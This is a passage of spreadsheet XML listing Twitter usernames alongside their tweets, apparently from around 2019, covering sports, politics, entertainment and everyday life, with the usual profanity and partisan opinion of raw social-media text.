    <t>🏆A HUGE CONGRATULATIONS TO THISTLE YELLOW WHO ARE CHAMPIONS!🥇 Well done and thank you to all mental health teams who took part in such a fantastic day. Dundee United FC Queen's Park FC Clyde FC Stenhousemuir FC St.Johnstone FC Where there is a person, there is a purpose! https://t.co/0qAhSiBYXV</t>
  </si>
  <si>
    <t>MissBeee86</t>
  </si>
  <si>
    <t>Growing my hair out is going to be the death of me 🙄🙄🙄</t>
  </si>
  <si>
    <t>sandieshoes</t>
  </si>
  <si>
    <t>@jaycee1001 @Zatorius211 @SueWhitaker11 @paulleclercq61 @jude_bowers I don’t believe that for one minute. Boris wants Brexit as long as Boris delivers it. Nigel wants Brexit as long as Nigel delivers it. The egos of BOTH men will cost us Brexit. BP came 3rd in a leave constituency last night. Handing the seat to Lib Dem’s 🤦🏼‍♀️🤦🏼‍♀️</t>
  </si>
  <si>
    <t>Rivals</t>
  </si>
  <si>
    <t>The @Rivals 2020 position rankings have been updated, and @ChadSimmons_ has the storylines developing at the position and a player to watch https://t.co/wuxLZfhJdj https://t.co/69EESGkqT1</t>
  </si>
  <si>
    <t>mechamelissa</t>
  </si>
  <si>
    <t>Not to brag* or anything but I own a dress from the same shop Lana Del Rey’s billboard dress is from. Mine’s on the left *definitely bragging bc I’ve had a Week https://t.co/bawZ997o9T</t>
  </si>
  <si>
    <t>michaelceratops</t>
  </si>
  <si>
    <t>Up watching the #G1Climax because why not? I don’t have anything to do tomorrow except everything?</t>
  </si>
  <si>
    <t>sheilakathleen</t>
  </si>
  <si>
    <t>@theoneroller There are many "Here's Johnneeeeee" moments in the series!</t>
  </si>
  <si>
    <t>johnspiercings</t>
  </si>
  <si>
    <t>Your unique take on the world is exactly what is needed to bus... More for Aries https://t.co/feqTQ3E9JG</t>
  </si>
  <si>
    <t>simoncholland</t>
  </si>
  <si>
    <t>No thanks, "30 adorable lunch ideas for back to school."</t>
  </si>
  <si>
    <t>theCEDproject</t>
  </si>
  <si>
    <t>@maxkellerman Max - why can’t we get a @mikeygarcia fight with @VasylLomachenko and what are your thoughts on the potential of @TeofimoLopez in there with both those guys?</t>
  </si>
  <si>
    <t>adamcraig97</t>
  </si>
  <si>
    <t>#JoinJeff and share this for a chance to be one of five winners of £100! A winner is picked at 10:00 Friday! https://t.co/IW3D9uXaeQ</t>
  </si>
  <si>
    <t>PalMissionUK</t>
  </si>
  <si>
    <t>A leading Palestinian human rights organisation submits urgent appeal to the UN on the ongoing Israeli smear campaign against its work and workers https://t.co/0bym4K47ra</t>
  </si>
  <si>
    <t>LizOrangeLiz</t>
  </si>
  <si>
    <t>@brendaincincy @slhalter @Liz_Wheeler Is it radical to evolve? In 20 years no one will bat an eyelid. I do agree there is age appropriate sex education and anyone with any knowledge of a child's brain development concerning comprehension will hopefully understand</t>
  </si>
  <si>
    <t>RealEstateMedi1</t>
  </si>
  <si>
    <t>Short Term Rental with Maria Rekrut hosted by Jay Shaw and Erika Spencer https://t.co/iTnvlWInmY via @YouTube</t>
  </si>
  <si>
    <t>iloveyouselenna</t>
  </si>
  <si>
    <t>Due to personal reasons I think everybody lying idc. Ain't nobody ever told the truth and that's sad</t>
  </si>
  <si>
    <t>shawn_adams1</t>
  </si>
  <si>
    <t>@SpeakerPelosi @realDonaldTrump Impeach him or stfu and get out of the way.</t>
  </si>
  <si>
    <t>smashwebster</t>
  </si>
  <si>
    <t>I’m not the person that wakes up 2 hours before my alarm &amp; just gets up. I’m the person that wakes up 2 hours before my alarm &amp; tries to go back to sleep until 10 seconds before it goes off.</t>
  </si>
  <si>
    <t>lookatlauren</t>
  </si>
  <si>
    <t>Bathing the Stacie bros because uncle @ghondronastas is coming to visit! :)</t>
  </si>
  <si>
    <t>jmendoza010</t>
  </si>
  <si>
    <t>You know what I hate? People who self-proclaim themselves the “MOM” of the friend group. You asked people if they wanted water ONE TIME. CALM DOWN Jennifer.</t>
  </si>
  <si>
    <t>TweetHomeAlabma</t>
  </si>
  <si>
    <t>@PattyMurray @senatemajldr I don’t care what you call someone that kills another person. They are not normal, they are sick. Are we going to ban automobiles for the people killed by drunk drivers?</t>
  </si>
  <si>
    <t>mikeyinhouston</t>
  </si>
  <si>
    <t>@hboulware They would have never broken ground on the Hoover Dam today due to litigation. This is why we can't have nice things.</t>
  </si>
  <si>
    <t>Duke_temz</t>
  </si>
  <si>
    <t>@kenadirenee @TreaTrea1 @KingLRG_ But The foam is nonexistent, its the bristle brushes I wouldn't use. If there's a proper sponge at the end, then it'll be good.</t>
  </si>
  <si>
    <t>lhfaria</t>
  </si>
  <si>
    <t>Ok looks like Brad Pitt, DiCaprio and Margot Robbie are here at the Soho House in Berlin for the premiere of Once Upon a Time in Hollywood. https://t.co/Q2VSYrDbzn</t>
  </si>
  <si>
    <t>MarlowSherwood</t>
  </si>
  <si>
    <t>[Read] Mobi Case Files for Basic Trial Advocacy, Second Edition &gt;&gt; https://t.co/Y1Ig8FcDrY</t>
  </si>
  <si>
    <t>_CarlosDaMan_</t>
  </si>
  <si>
    <t>@nicroveda Were you looking to record game footage separate from OBS recordings? If not you can deinterlace footage straight in OBS</t>
  </si>
  <si>
    <t>LinehanWeldon</t>
  </si>
  <si>
    <t>Synopsis of Crochet For Beginners: A Complete Step By Step Guide With Picture illustrations To Learn Crocheting The Quick &amp; Easy Way &gt;&gt; https://t.co/Fq3wtrYxhZ</t>
  </si>
  <si>
    <t>umair984</t>
  </si>
  <si>
    <t>@HarrisRichard77 After successful launch of Hindu Taliban Im now seeing a third faction proping up, the great LIBERAL TALIBAN</t>
  </si>
  <si>
    <t>KFIAM640</t>
  </si>
  <si>
    <t>Greenland's government said Friday that the island was "not for sale" after reports that President Donald Trump had entertained the idea of buying the autonomous Danish territory. https://t.co/WHPIaTxApn</t>
  </si>
  <si>
    <t>Luckychucky__</t>
  </si>
  <si>
    <t>@MRAnthony1011 Frigging awesome father!!! I did the same. She is a very sweet, kind, confident and successful young lady.</t>
  </si>
  <si>
    <t>OurBodiesChoice</t>
  </si>
  <si>
    <t>"The bill cannot be overly prescriptive on clinical matters." Once again, that is not the point of legislation and it does not happen for any other medical procedure.</t>
  </si>
  <si>
    <t>SF49ers_love</t>
  </si>
  <si>
    <t>@aserious49erfan I lose my shit when people tell@em to calm down. Lol. I’m gonna video tape it one day. 😂😂</t>
  </si>
  <si>
    <t>icari_</t>
  </si>
  <si>
    <t>I dead ass need to clean my room</t>
  </si>
  <si>
    <t>Jealous0rchids</t>
  </si>
  <si>
    <t>My Spotify playlist keeps playing songs from only save rock and roll tho I'm not complaining I just don't think they shuffled them that well...</t>
  </si>
  <si>
    <t>NewsAlarms</t>
  </si>
  <si>
    <t>Woman awarded $3.2 million in revenge-porn lawsuit against Army officer ex-husband and his girlfriend https://t.co/wTDAnhaUTS</t>
  </si>
  <si>
    <t>ifitweremydream</t>
  </si>
  <si>
    <t>@yashar not to mention it is all a fallacy.</t>
  </si>
  <si>
    <t>XTRA1360</t>
  </si>
  <si>
    <t>Kevin Acee On Paddack Inning Limit, Tatis Jr. Injury And More https://t.co/whYagMPzOC</t>
  </si>
  <si>
    <t>NaturalRapunzel</t>
  </si>
  <si>
    <t>I might need to go to the doctor for this knee. I'm in so much pain man. I need this muscle relaxer to kick in or something.</t>
  </si>
  <si>
    <t>CaroleTBeers</t>
  </si>
  <si>
    <t>@CamillaWrites Ha-Lo, writing lovelies. And muglies. However you identify is perfect. If you’re a serious creative and like interacting, let’s follow and get to know. View me and my projects, #PepperKaneMysteries, at https://t.co/U6j4fMFtMX You also are welcome to like https://t.co/ToC4J6eQVh</t>
  </si>
  <si>
    <t>itsnot1899</t>
  </si>
  <si>
    <t>@nsw_upperhouse Can you confirm that all the submissions to parliament on the abortion bill were actually read? #nswpol</t>
  </si>
  <si>
    <t>jasmyne_15</t>
  </si>
  <si>
    <t>Acne is definitely caused by toxic situations... GUESS WHOS FACE IS CLEARING UP</t>
  </si>
  <si>
    <t>RobertdeGraaf2</t>
  </si>
  <si>
    <t>@KoalaMattress @2GB873 Don't dance around the issue @KOalaMattress - give it to us straight, tell us what you really think.</t>
  </si>
  <si>
    <t>nonexistenteli</t>
  </si>
  <si>
    <t>I hate mfs that play both sides, chose up 😂</t>
  </si>
  <si>
    <t>aspacepress_</t>
  </si>
  <si>
    <t>▵ Our nature zine #IfATreeFalls was composed entirely outdoors + includes contemplations on bugs, trees, anxieties + being a human being. All profits go to this incredible reforestation + educational organization @forests_ontario! We’ve just donated … https://t.co/lkuKKzfSQc https://t.co/6R7TAHyEWX</t>
  </si>
  <si>
    <t>JustinMoris</t>
  </si>
  <si>
    <t>@failsonmcdonald he needed to talk to Evangeline Lilly. He has questions about LOST.</t>
  </si>
  <si>
    <t>LoneWolf_3039</t>
  </si>
  <si>
    <t>The plot thickens. #raw #SDLive #wwe #SummerSlam https://t.co/7rY1IMqDRQ</t>
  </si>
  <si>
    <t>KPrzybilski</t>
  </si>
  <si>
    <t>Inspiring Dog Rescue By Team Of Good Samaritans The Epoch Times Canada https://t.co/r0RG9jR6vN</t>
  </si>
  <si>
    <t>_ScottishRed</t>
  </si>
  <si>
    <t>@merseystardust Haha been torture reading the shite on here today and being unable to reply 😂 cheers Char x</t>
  </si>
  <si>
    <t>Call_Me_Pack</t>
  </si>
  <si>
    <t>Who talks more about being a veteran between buttigieg and gabbard muh veteran experience muh honor muh service</t>
  </si>
  <si>
    <t>caughtinplaid</t>
  </si>
  <si>
    <t>@AtemPB @CoordsPokemon @IceColdMystic @logoloot @jenghom @Ganjasaur_R1 @cadester22 @GaganGulati333 @Shinytracker @StardustPokmnGO @galeriep @engel_go @KetchumShiny Omg I hope I’m not too late but I’d love to have one 😭</t>
  </si>
  <si>
    <t>SubliminalMMA</t>
  </si>
  <si>
    <t>@Gugabed Don’t tend to arb that much but yeah I should have.</t>
  </si>
  <si>
    <t>RealGoodJim</t>
  </si>
  <si>
    <t>@schadjoe Does Van Ginkel make the team?</t>
  </si>
  <si>
    <t>dewsnew</t>
  </si>
  <si>
    <t>@realDonaldTrump Man .... America is soooo great right now, sooo much winning! We’re literally afraid to go to church and grocery shopping, but yeah... awesome. #PleaseFuckOff #MAGA</t>
  </si>
  <si>
    <t>MusicRadar</t>
  </si>
  <si>
    <t>.@Fender is helping people to learn guitar at work in a bid to improve wellness https://t.co/odMsx0nTmR</t>
  </si>
  <si>
    <t>CFP_Bot</t>
  </si>
  <si>
    <t>Likeness Ideologies: Phonology and Cats https://t.co/wFCDKLOLt3 #CallforPapers</t>
  </si>
  <si>
    <t>HIMilpitas</t>
  </si>
  <si>
    <t>Less than a month old... stop in and experience the enjoyment of staying in a brand new hotel room at a brand new property in Silicon Valley. #HolidayInnSiliconValley - (408) 240-8000 - https://t.co/qvjxxtxze8 https://t.co/Pzj0k3b9Nz</t>
  </si>
  <si>
    <t>worldofpips</t>
  </si>
  <si>
    <t>@ChrisWeston_PS Great Webinar. How can one access your spreadsheets that summarise the week ahead. Weekly implied vol/RR etc. Is there a paid subscription service?</t>
  </si>
  <si>
    <t>NortFX</t>
  </si>
  <si>
    <t>@amy_jadee You’ve made an omelette and 2 fried eggs by the time you make that contraption, like what is the point tbhh</t>
  </si>
  <si>
    <t>Jamie_L_UK</t>
  </si>
  <si>
    <t>@IDWPublishing This has the starting of a shampoo advert.</t>
  </si>
  <si>
    <t>BxngaliG</t>
  </si>
  <si>
    <t>The #thong photo sets I just posted on https://t.co/kAf3kDfbVV that you subs/cucks are paying for, alpha got for free hahaha! #cuckoldress https://t.co/WfJa6WZBTq</t>
  </si>
  <si>
    <t>Colsta13</t>
  </si>
  <si>
    <t>Desperate search for missing boy, 6, who fell into river while fishing with dad https://t.co/507MXg03Ji</t>
  </si>
  <si>
    <t>DontCallMeRon</t>
  </si>
  <si>
    <t>One of my favorite things in the world is when I’m driving with my kids and thriller comes on and they both, unprompted, do their best evil laugh with #VincentPrice at the end.</t>
  </si>
  <si>
    <t>DavidLHenning</t>
  </si>
  <si>
    <t>S Sweeper - You're listening to Freshstart Radio Live 1</t>
  </si>
  <si>
    <t>sandi27vh</t>
  </si>
  <si>
    <t>@Neener1973 @BH90210 Ok, so my husband is wrong...I’m not a dork and there’s nothing wrong with me! I’m NOT the only one obsessed with this reboot!</t>
  </si>
  <si>
    <t>RedRumSanti</t>
  </si>
  <si>
    <t>I would like to send a special shoutout to those who expressed solidarity. Even though I was on the streets last night I refused to go to sleep because of y'all. I'm ten toes because I don't wanna let y'all down. https://t.co/mShGnagmxx @gofundme https://t.co/Arkouztjnw</t>
  </si>
  <si>
    <t>VaneetaKaur</t>
  </si>
  <si>
    <t>@PFDonato Hey everyone! It's Vaneeta here :) Currently #amwriting my sequel to my soon to be self published novel #BrokenBranches ! Hope you all have a lovely Wednesday! It's pouring this morning but i love rain so it's brill !! https://t.co/llnQ7BcgzI</t>
  </si>
  <si>
    <t>NatalieeNicolee</t>
  </si>
  <si>
    <t>I’m low key getting sad I only have another week at INO, I’m gonna miss my coworkers soo much 😭 not working just the co workers lmfaooo 😂😂😂😂</t>
  </si>
  <si>
    <t>olivialagunzad</t>
  </si>
  <si>
    <t>@desbfit This is the best I’ve seen girl YES</t>
  </si>
  <si>
    <t>WheelsBeRollin</t>
  </si>
  <si>
    <t>@cynvisible Yes, nice little preset. Would probably create more rage and distracted drivers.</t>
  </si>
  <si>
    <t>naomixff</t>
  </si>
  <si>
    <t>@Dnero_96 The Book Thief</t>
  </si>
  <si>
    <t>ReluctantPlnr</t>
  </si>
  <si>
    <t>@MorphetMinor @Shortsarky88 @RolandKarthaus Surely rightsizing has equally negative connotations. It smacks of class war - anyone in a big house is wrong and doesn’t deserve to live there.</t>
  </si>
  <si>
    <t>grazynaakr</t>
  </si>
  <si>
    <t>And my dad, who isn’t a museums biggest fan, spent the longest time looking round. This was his favourite piece- finding out all about the Kewsick characters. He was fascinated by the fact all the people could be identified. https://t.co/vfADe2jhUz</t>
  </si>
  <si>
    <t>ElissaKings</t>
  </si>
  <si>
    <t>@_political_p I love Amy, but Joe gets the Midwest all on his own. He doesnt need her. Union folks and the Midwest already like him. Amy is great but I think he needs a bit more dazzle.</t>
  </si>
  <si>
    <t>destroyboysband</t>
  </si>
  <si>
    <t>This is the best tik tok made with Probation https://t.co/y509wXZfvG</t>
  </si>
  <si>
    <t>John49690391</t>
  </si>
  <si>
    <t>@hboulware Dragonjackal’s Guide to Prenatal Child Care. Almost as informative as OJ’s Guide to Conflict Resolution.</t>
  </si>
  <si>
    <t>simbaisenigma</t>
  </si>
  <si>
    <t>Commitments pertain not only to lifelong companions, but also ... More for Leo https://t.co/cYxnLblU5u</t>
  </si>
  <si>
    <t>GeekVersusNerd</t>
  </si>
  <si>
    <t>@Roisinmdoyle All that matters is that the IRFU are looking healthy 😜</t>
  </si>
  <si>
    <t>joesegal</t>
  </si>
  <si>
    <t>I was just trying to explain what's going on here in the US to someone from another country. It's hard to do.</t>
  </si>
  <si>
    <t>JuiceMan99</t>
  </si>
  <si>
    <t>@mustbepear Waiting for the day her eyes are not visible due to her face swelling from all the fat cells! Then she will claim she’s blind or some shyt 🤯🤯🤯</t>
  </si>
  <si>
    <t>TheBeatBoxTweet</t>
  </si>
  <si>
    <t>Now Playing Yo Gotti, Mike WiLL Made - It - Rake It Up On The Beatbox Music Channel</t>
  </si>
  <si>
    <t>statesuxgoblue</t>
  </si>
  <si>
    <t>@JesseKellyDC Sorry that’s not part of the schools curriculum, so it would not be taught to my children. Reading, writing, Math, science, history, how to balance a check book and so on, are what they need to know in school not how to rely on the government for everything.</t>
  </si>
  <si>
    <t>suprchi0dosbr0s</t>
  </si>
  <si>
    <t>@SteveRaffle Oh potatoes and molasses!</t>
  </si>
  <si>
    <t>pink_vonna</t>
  </si>
  <si>
    <t>Ready for dinner 😂😭</t>
  </si>
  <si>
    <t>Funyins1004</t>
  </si>
  <si>
    <t>@surveyor1959 @thecjpearson Ok grandpa...btw it was the commies that got tRump elected and are controlling him as we speak. If you support tRump you’re the commie puppet your so afraid of</t>
  </si>
  <si>
    <t>vobolatte</t>
  </si>
  <si>
    <t>@BoosLilBub me going from having a good day to being absolutely devastated about something minor</t>
  </si>
  <si>
    <t>bebezens</t>
  </si>
  <si>
    <t>if wonho still shows up to the la concert and looks to be in even worse condition then I'm suing starship, epic records, fist fighting eshy in the parking lot behind denny's, powerhouselive, the staples center, los angeles air-</t>
  </si>
  <si>
    <t>HeroesAcademic</t>
  </si>
  <si>
    <t>1.) When writing a report, the introduction includes the background https://t.co/N9BuYe1aEE</t>
  </si>
  <si>
    <t>thetimetakenup</t>
  </si>
  <si>
    <t>had to do a photoshoot with her obviously!!! she’s gorgeous!!! i’m so happy!!! i love you @taylorswift13 !!! https://t.co/T30oHX1D5G</t>
  </si>
  <si>
    <t>Etaylor718</t>
  </si>
  <si>
    <t>Was I the only one singing the theme song to Power in Joe's voice? 🤷🏽 We need the original song back @Power_STARZ</t>
  </si>
  <si>
    <t>_dommieee219</t>
  </si>
  <si>
    <t>Everybody needs to listen to this 😭 https://t.co/hWaJWr9EFS</t>
  </si>
  <si>
    <t>yegbreannabelle</t>
  </si>
  <si>
    <t>@TheCarmenRey Yeah. I guess it's just another case of the rich getting away with fucking everything. I'm upset.</t>
  </si>
  <si>
    <t>miIkybear</t>
  </si>
  <si>
    <t>bout to get my titties pierced</t>
  </si>
  <si>
    <t>girlfree730</t>
  </si>
  <si>
    <t>@JustSumGuy176 I don’t know the person who responded but I didn’t read any malice from the tweet. It’s a tough call for those battling cancer to decide whether to do chemo or not. Love, light &amp; prayers for you &amp; your Mom.</t>
  </si>
  <si>
    <t>runningboffin</t>
  </si>
  <si>
    <t>@IanMacd47681792 @barstoolWSD Sad that she couldn't appreciate the other team's skill without being criticised</t>
  </si>
  <si>
    <t>tjbelasco</t>
  </si>
  <si>
    <t>Who did NJ name as the best teacher in every county? https://t.co/NOmNnsciCX via @northjersey</t>
  </si>
  <si>
    <t>TheBitchyQueen1</t>
  </si>
  <si>
    <t>The Oddest and Most Awkward Diplomatic Posting in the World.... and so, it all failed! Y después niegan que están revueltos..what a waste! https://t.co/KMhs1SVYj9</t>
  </si>
  <si>
    <t>BlakeDorian</t>
  </si>
  <si>
    <t>@kennabbby What version u play? This will partially determine my opinion of u moving forward (tho I think I know the answer)</t>
  </si>
  <si>
    <t>CafeEstimes</t>
  </si>
  <si>
    <t>Let your taste buds do the talking! https://t.co/LXVTF6GbS0</t>
  </si>
  <si>
    <t>jshoreboston</t>
  </si>
  <si>
    <t>@glenn_wofford @Divesharksnemo @Specialforcese5 @NRA @NRAILA @GOP @realDonaldTrump "suicides? "gang deaths?" "choice by the child?" where was that mentioned?</t>
  </si>
  <si>
    <t>wooflecone</t>
  </si>
  <si>
    <t>Lots of interesting stuff in the u store (70% off Universal team member store)... butterbeer caps, JP tshirts &amp; shot classes, raptor hands (lol), Marvel, HTTYD (Hiccup &amp; Astrid), &amp; Kung Fu Panda plush... if any of my mutuals wants me to grab somethin for em lmk!</t>
  </si>
  <si>
    <t>playgirlplussy</t>
  </si>
  <si>
    <t>THE LESS WE GROW STRENGTHEN OUR COMMUNICATIONNNNNNNNNN</t>
  </si>
  <si>
    <t>Ern_Perro85</t>
  </si>
  <si>
    <t>My Boy turns 3yrs old in a few days, pretty excited about his BDay. Taking him out for a fund day.</t>
  </si>
  <si>
    <t>ondu1</t>
  </si>
  <si>
    <t>It's currently Rain and 22 Celsius outside,so use your rain coat in Manchester UK https://t.co/Xca3TQ3IWc</t>
  </si>
  <si>
    <t>samcart</t>
  </si>
  <si>
    <t>@itstetrisbish I won’t be in ny til Tuesday and the pop up is gone by then 😩</t>
  </si>
  <si>
    <t>Thejuliakhalifa</t>
  </si>
  <si>
    <t>The cockroaches that come on my patio at this hour kill my vibe every time 😑 especially the flying ones</t>
  </si>
  <si>
    <t>WrightDuclos</t>
  </si>
  <si>
    <t>I went on a walk today, I took some pics and I’m sharing them here. https://t.co/zsXS2eK20X</t>
  </si>
  <si>
    <t>nesha1425</t>
  </si>
  <si>
    <t>@kbz3031 @HoodedSkater @AntisocialJW2 @MsBlaireWhite Technically if I wanted to misgender him,I would have said it instead of him. At least I called him by his assigned gender at birth,he should be thankful to get that. But I'm intrigued what's the slippery slope you speak of?</t>
  </si>
  <si>
    <t>MrsLauraBski</t>
  </si>
  <si>
    <t>@robreiner You are spewing hate comments. Better stop it. We won’t listen to washed up Hollywood peeps. Sorry 😐 https://t.co/aF5ygNIz07</t>
  </si>
  <si>
    <t>mizwizmizwiz</t>
  </si>
  <si>
    <t>@creekbear Nope I didn't know that. I need a warning bumper sticker to put on my commode!!! ⚡️🌩️😱</t>
  </si>
  <si>
    <t>Aquatic_Sloth</t>
  </si>
  <si>
    <t>@Daijee7 y’all like sex but have y’all BEEN TO THE NATCH?</t>
  </si>
  <si>
    <t>rhasse85</t>
  </si>
  <si>
    <t>I'm looking for a PE teacher and a few more paraprofessionals. Interested? Know someone? https://t.co/d4wDTlsyfW</t>
  </si>
  <si>
    <t>AfroNerdTV</t>
  </si>
  <si>
    <t>The purge had like 4 movies but The Hunt is where we draw the line? 😂😂😂</t>
  </si>
  <si>
    <t>sedonapies</t>
  </si>
  <si>
    <t>The latest Good Food News! https://t.co/U2aGoi6cMV Thanks to @ashortscientist @JMiquelWine @HsvGreenTeam #wine #food</t>
  </si>
  <si>
    <t>JayWilko_</t>
  </si>
  <si>
    <t>So all the way back to Liverpool while I was trying to have my first sleep since Saturday they just kept shouting about how they had to stand up and it was disrespectful cos they paid £90 for tickets News flash you fucking wool You can select to get allocated seats for free</t>
  </si>
  <si>
    <t>thefake_serg</t>
  </si>
  <si>
    <t>@JLoganSports @MichaelRyanRuiz How thick are your socks? Sheesh. Wearing slides with no socks looks worse to me. Also, it’s just a comfort thing not necessarily to “let them breathe”. Flip flops you obviously gotta ditch the socks.</t>
  </si>
  <si>
    <t>TheStrickdogJr</t>
  </si>
  <si>
    <t>@JPFinlayNBCS It’s like maybe he wants Haskins to push for it but idk</t>
  </si>
  <si>
    <t>g8erlaw68</t>
  </si>
  <si>
    <t>@pink_funk The Last Boy Scout comin' yall.</t>
  </si>
  <si>
    <t>averyxdaniel</t>
  </si>
  <si>
    <t>i dropped my straightener and burned the fuck out of my leg 🤡</t>
  </si>
  <si>
    <t>Mysonismyheart9</t>
  </si>
  <si>
    <t>@J_Drew23 You should be able too..somehow the app is on your phone or comp..I don't think ifs all on Twitter but you can look within the Twitter app to see if its active there</t>
  </si>
  <si>
    <t>ErinSloman</t>
  </si>
  <si>
    <t>Too much love for this girl. 🖤 https://t.co/hpH2W10n8w</t>
  </si>
  <si>
    <t>MadiDel4</t>
  </si>
  <si>
    <t>Um. I am starting to love @Phil_Mizuno cosplays! I poor fangirl heart has made a discovery! https://t.co/p9z9wpvLx8</t>
  </si>
  <si>
    <t>Blog_Mickey</t>
  </si>
  <si>
    <t>Time for our build-your-own sundaes!! 16 toppings and three different types of ice cream https://t.co/zfUYn53Kd4</t>
  </si>
  <si>
    <t>danielbsmith</t>
  </si>
  <si>
    <t>@BritAbout @mmpadellan A suicide... On his knees?! With the sheet-as-rope attached to the top bunk? That has made me doubt it again. But I wonder if it wasn't Barr. Felons are known for hating child rapists and killing them while behind bars. I think that is the most likely scenario.</t>
  </si>
  <si>
    <t>paulranisav</t>
  </si>
  <si>
    <t>@AlexanderDowner @JoshFrydenberg You poor dear , sorry we have to apply the rules to everyone , even though you don't.</t>
  </si>
  <si>
    <t>GarthBennett7</t>
  </si>
  <si>
    <t>@politico Trump is too cowardly to visit Baltimore!</t>
  </si>
  <si>
    <t>SeanLyn71874273</t>
  </si>
  <si>
    <t>@nytimes Wasn’t aware the shooting happened in Mexico!</t>
  </si>
  <si>
    <t>GoonsIy</t>
  </si>
  <si>
    <t>@Pathwaee @Bella2shine “Aye lemme y’all to you like my shit and I’ll like yours” 😂😂</t>
  </si>
  <si>
    <t>cindy_lalechuga</t>
  </si>
  <si>
    <t>@omgeteresaa Some good rock en español always puts me in a good mood. Specially the intro to lamento boliviano</t>
  </si>
  <si>
    <t>ellepsd</t>
  </si>
  <si>
    <t>I’m not sure why there’s so much talk about Popeyes on my feed butttt it’s making me hungry and I’m gonna need it to stop before I Uber Eats some chicken from up the block 😩</t>
  </si>
  <si>
    <t>L80K8</t>
  </si>
  <si>
    <t>@anthonyjeselnik At least he believes in Adam and Eve #Creatism...although I would like to believe it wasn't rape when the cycle started lol</t>
  </si>
  <si>
    <t>JustGrapeful</t>
  </si>
  <si>
    <t>@shasta_cat Mine's the exact opposite. Guess it really depends.</t>
  </si>
  <si>
    <t>UTRGVGrad</t>
  </si>
  <si>
    <t>The weekend has landed Vaqueros! Happy Friday ✌🤠! #UTRGV https://t.co/lOVkHYgs2I</t>
  </si>
  <si>
    <t>5lawslib</t>
  </si>
  <si>
    <t>How Parents Can Help Middle Schoolers Build Confidence and Character | Deborah Farmer Kris @MindShiftKQED https://t.co/ZpDSXL9Jnf https://t.co/gWoycqTrZG</t>
  </si>
  <si>
    <t>cycles1313</t>
  </si>
  <si>
    <t>⁦@tedwheeler⁩ . Portland Mayor has allowed ANTIFA to ravage the City of Portland while he hides like a baby? Portland mayor distances self from Antifa violence in his city: 'I wasn't even here' | Fox News https://t.co/Ea6Qbqfp8F</t>
  </si>
  <si>
    <t>MrRedMist</t>
  </si>
  <si>
    <t>@LittlewoodsHelp Would you like to read the sale of goods act before responding? One year for a laptop is not acceptable</t>
  </si>
  <si>
    <t>GoingShortRR</t>
  </si>
  <si>
    <t>It’s all BS. “The system” wants it the way it was before Trump. I want Term Limits for all People in government and banning lobbyists is far more important than banning ARs. If you give me that, I’ll vote for Andrew Yang... Deal?</t>
  </si>
  <si>
    <t>vipsgupta</t>
  </si>
  <si>
    <t>The latest The #Travel Daily! https://t.co/QUnEer8PdL #52places #brighton</t>
  </si>
  <si>
    <t>bill_w94</t>
  </si>
  <si>
    <t>Google Meddled In The 2016 Election, And They Are Still Doing It https://t.co/QVgLC1ZgB9</t>
  </si>
  <si>
    <t>annie_rees</t>
  </si>
  <si>
    <t>@JDEdw4rds There are 34 islands in the Mediterranean 🤷🏻‍♀️ But mainly you’re still younger than me!</t>
  </si>
  <si>
    <t>Pinkcloud15</t>
  </si>
  <si>
    <t>@ginnylourn @OhNoSheTwitnt Absolutely agree! I am a true BELIEVER in hard work, honesty, law obeying, integrity, gratitude and respect! I apologized for my rushed poor judgment 😔, I see you are a kind hearted and reasonable person. I am glad we met 😁 https://t.co/NytTnU2LkS</t>
  </si>
  <si>
    <t>Bejarano3Oscar</t>
  </si>
  <si>
    <t>@andrearenee__ okay was it fun cause i wanted to go, also how we live in the same city &amp; never seen ya 😭</t>
  </si>
  <si>
    <t>notKoze</t>
  </si>
  <si>
    <t>@PIBBLEBITCH Where’s the all of the above button</t>
  </si>
  <si>
    <t>SteveDoherty3</t>
  </si>
  <si>
    <t>@inthehammer1 Atta boy 🔨! Sounds like a good day so far, minus being woken by a contractor. CHEERS brother! Do you get a weekend, after the night is over?</t>
  </si>
  <si>
    <t>tryxie1010</t>
  </si>
  <si>
    <t>@BuzzPatterson It’s a gorgeous and very welcoming city !</t>
  </si>
  <si>
    <t>skiwildcat</t>
  </si>
  <si>
    <t>A little pre season stoke for those of you who cannot wait for the White Mountains to be covered in snow again ... 2019-20 Winter Lift Tickets are ON SALE NOW! The earlier you buy the more you save. Some deals up to 75% off https://t.co/jXMX4aPktC https://t.co/1OeFKyYhPj</t>
  </si>
  <si>
    <t>LuxAstarte</t>
  </si>
  <si>
    <t>Had a blast at @Rickert_Beagle today! Got to hang out with @xaoc too so BONUS!</t>
  </si>
  <si>
    <t>kklz963</t>
  </si>
  <si>
    <t>Win free tix for Mike &amp; Carla's "End of Summer Bash," DLVEC, September 7th, at 340pm on 96.3 KKLZ! https://t.co/7iWViU7qmZ https://t.co/rKZae0lswN</t>
  </si>
  <si>
    <t>foxesinfiction</t>
  </si>
  <si>
    <t>might fuck around and speak ill of the dead</t>
  </si>
  <si>
    <t>Lisa9Liz</t>
  </si>
  <si>
    <t>@nancylevine @joncoopertweets @realDonaldTrump Weep.. At the overflow crowd 🐝itch. https://t.co/DU6RURW1qw</t>
  </si>
  <si>
    <t>bushid0xbrown</t>
  </si>
  <si>
    <t>@nephewhesh Where can I listen to this?</t>
  </si>
  <si>
    <t>Lamarmalik1</t>
  </si>
  <si>
    <t>@RaylaRimpson @BustyRusty8 I was talking to the wrong account! https://t.co/AkEfYZO4HB</t>
  </si>
  <si>
    <t>Sports_philli</t>
  </si>
  <si>
    <t>@Lott777 @WBA My Dad had a pretty bad heart attack two years ago and was rushed to Stoke and it's massively affected him. He comes alive when I take his program collection, there generation have such recollection of their football. A working class game played by working class heroes.</t>
  </si>
  <si>
    <t>_relaxbro</t>
  </si>
  <si>
    <t>My friends not going to lmfao . They finna be attached at my son’s hip like they gave birth 🙄</t>
  </si>
  <si>
    <t>eale391</t>
  </si>
  <si>
    <t>With me personally, if or more so when I achieve the type of success that I plan on achieving, I would more likely end up staying single for a very long time. I would reject most of the women that would approach me, due to Golddiggery. That's why I'm a MGTOW</t>
  </si>
  <si>
    <t>ifranto</t>
  </si>
  <si>
    <t>@tedneward it takes an extra condenser mic and another channel. That's about it.</t>
  </si>
  <si>
    <t>tj_altamirano</t>
  </si>
  <si>
    <t>@CephusH Wow pops was serious. Quick left jab to the body then lights out.</t>
  </si>
  <si>
    <t>angieLovesUSA</t>
  </si>
  <si>
    <t>@FrognLily @TimRunsHisMouth @CraigCons It proves they Believe women are half the value of a man.</t>
  </si>
  <si>
    <t>adventurenlore</t>
  </si>
  <si>
